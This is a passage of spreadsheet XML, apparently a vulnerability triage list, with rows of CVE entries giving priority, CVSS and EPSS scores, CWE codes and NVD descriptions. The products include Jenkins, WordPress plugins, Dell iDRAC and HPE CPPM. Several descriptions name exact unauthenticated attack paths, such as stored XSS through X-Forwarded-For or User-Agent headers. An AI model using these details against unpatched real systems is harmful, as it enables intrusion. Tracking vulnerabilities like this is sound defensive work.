          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, Jenkins does not rotate the session when a user is authenticated via the "remember me" cookie, allowing attackers able to serve content on the same site as Jenkins to set a known session cookie in the victim's browser, which after the victim authenticates via the "remember me" cookie, grants the attacker access to Jenkins as that user.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84652</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89521</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/core: Handle pick_task() releasing the rq lock
Core scheduling's pick_next_task() breaks when a -&gt;pick_task()
implementation can release the rq lock. The selection state derived on entry
is only valid while the lock is held continuously. Once a pick can drop the
lock, an interleaving selection can invalidate all of it: the single-CPU
fast path can commit an uncookied pick although the core went cookied during
the release, and forceidle committed by the interleaving selection skews the
restarted pass's accounting.
Fix it by restarting the whole selection when a pick returns RETRY_TASK
after releasing the lock: a single restart point above the state derivation
replaces the per-loop restart labels, so a retry picks up state committed by
interleaving selections and accounts and resets forceidle like a fresh
selection would.
need_sync and fi_before latch across retries. Clock validity can't be
re-derived - there is no program-ordered way to tell whether the own and
core rq clocks are still updated after the lock was released, as other
lockers' pin cycles may or may not have invalidated them. When restarting,
clear core_clock_updated so that the sibling loop re-updates the core rq,
and update the own rq clock if invalidated.</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89521</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17037</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>The Kirki – Freeform Page Builder, Website Builder &amp; Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘comment’ parameter in all versions up to, and including, 6.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17037</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18579</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>The WP Photo Album Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'HTTP_X_FORWARDED_FOR' parameter in all versions up to, and including, 9.2.08.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce failure path for the getshortcodedrenderedfenodelay action serves as the log-write trigger rather than an access barrier — a deliberately failed nonce check causes wppa_log() to record the attacker-supplied X-Forwarded-For value to disk, making the exploit fully reachable by unauthenticated callers via the wp_ajax_nopriv_wppa endpoint.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18579</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23855</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
      <c r="Q534" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>Dell iDRAC9, 14G versions prior to 7.00.00.184, 15G/16G versions prior to 7.30.10.50, and Dell iDRAC10, 17G versions prior to 1.30.30.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command injection.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23855</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47773</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-787</t>
        </is>
      </c>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>ArduinoBLE enables Bluetooth Low Energy connectivity on certain Arduino models. Versions prior to 2.0.2 contain a missing bounds check in the ATT layer write request handler that allows a remote, unauthenticated BLE client to corrupt memory in the ATTClass global object. Devices running ArduinoBLE with one or more characteristics configured with the BLEEncryption property are affected. The fix is included starting from the 2.0.2 release.</t>
        </is>
      </c>
      <c r="S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47773</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73769</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of vulnerable CPPM systems could allow an authenticated remote attacker to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73769</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73787</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the CPPM web interface could allow an authenticated remote attacker to access directory information on a vulnerable system. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73787</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74925</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>The MultiVendorX  WordPress plugin before 5.0.16 does not restrict who can update its role and capability settings, allowing users holding its vendor role to grant that role administrator-level capabilities and take over the site.</t>
        </is>
      </c>
      <c r="S538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74925</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75927</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>The PublishPress Capabilities – User Role Editor, Access Permissions, User Capabilities, Admin Menus plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.50.0. This is due to the `addPluginCapabilities()` function unconditionally granting the Editor role all 15 `manage_capabilities_*` capabilities — including `manage_capabilities`, `manage_capabilities_roles`, `manage_capabilities_settings`, and `manage_capabilities_backup` — via a hard-coded `$eligible_roles = ['administrator', 'editor']` assignment that runs automatically on the first `admin_init` after plugin activation with no administrator opt-in, persisting the grants directly to the database. This makes it possible for authenticated attackers with Editor-level access to elevate their privileges to a site-wide capability manager, enabling them to create, rename, and delete non-system roles, modify capabilities of non-administrator roles, restore role backups, and write arbitrary plugin options whose names begin with `cme_`, `capsman`, `pp_capabilities`, or `presspermit` via `update_option()`. The escalation stops short of full Administrator access, as WordPress's `map_meta_cap` layer still prevents the escalated Editor from granting administrator-only capabilities to other roles; however, all role-management and plugin-settings functionality gated solely on `manage_capabilities_*` capabilities remains fully accessible.</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75927</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79972</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79972</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81754</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>The Vigilant – 100% Free Security Suite: Firewall, 2FA, Login, Headers, Scanner… plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The malicious payload is delivered passively by any unauthenticated visitor who triggers a failed login attempt with a crafted User-Agent header, requiring no further interaction from the attacker once stored.</t>
        </is>
      </c>
      <c r="S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81754</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81825</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Chat Message in all versions up to, and including, &lt;= 20260811 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce protecting chat message submission is publicly visible on the chat page, rendering it ineffective as an authentication barrier and allowing fully unauthenticated attackers to submit malicious messages that are stored persistently and rendered to all visitors on every page load.</t>
        </is>
      </c>
      <c r="S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81825</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82583</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>NextGen Connect (Mirth Connect) versions 4.7.1 and earlier allow an authenticated user to execute arbitrary SQL through a Database Connector API, which could result in disclosure of stored credentials for connected systems, arbitrary file write, and a denial-of-service condition.</t>
        </is>
      </c>
      <c r="S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82583</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87020</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in a specified pitch and buffer-size computation leads to a heap out-of-bounds write when Orthanc DICOM Server decodes an attacker-supplied PNG.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87020</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
